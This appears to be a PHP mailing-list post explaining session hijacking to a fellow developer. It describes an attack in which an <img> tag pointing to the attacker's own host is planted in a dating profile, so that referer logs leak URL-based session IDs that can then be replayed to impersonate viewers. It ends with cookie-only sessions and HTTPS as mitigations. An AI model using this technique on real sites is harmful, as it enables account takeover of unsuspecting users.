NYCPHP Meetup

[Rolan Yang]

One way to hijack a session is to hack in, compromise a machine on the 
network and run a sniffer. Most hackers are not running sniffers to 
hijack sessions though. They sniff to grab login/passwords from 
pop/imap/smtp/ftp/telnet. Requiring  SSL/TLS protects you from this attack.

Another way to hijack sessions is to find websites that still append the 
session data to the url and links. The *friendfinder.com sites and 
several others, which I shall not mention, maintain sessions like that. 
I believe if you disable cookies in your browser, PHP reverts to url 
based sessions*.

Ok, so here's basically how it works: You find a php website which uses 
session cookies and allows you to post messages/stuff (eg. your dating 
profile). In your dating profile, you include some stuff about yourself 
"bla bla bla"... then add <img 
src="http://yourownwebsite.com/blankpixel.gif">

Then site back and wait.

Every now and then, grep your web server logs for "blankpixel.gif". The 
referer field in the log will list the referring url... which contains 
the appended session cookie. At this point, you can just copy+paste the 
referer url into your browser, click "GO" an assume the identity of the 
person who viewed your dating profile. For this reason, passing session 
id's via GET requests are extremely dangerous.

* safest thing to do is "enable session.use_only_cookies" and require 
that clients have cookies enabled.... and use https

~Rolan

Brian O'Connor wrote:

> I don't use cookies for that.  I use $_SESSION['userID'], 
> $_SESSION['user'], $_SESSION['pass'].
>
> I understand the concept of sessions, I don't understand the concept 
> of hijacking them, and making a system to prevent hijacking them.
>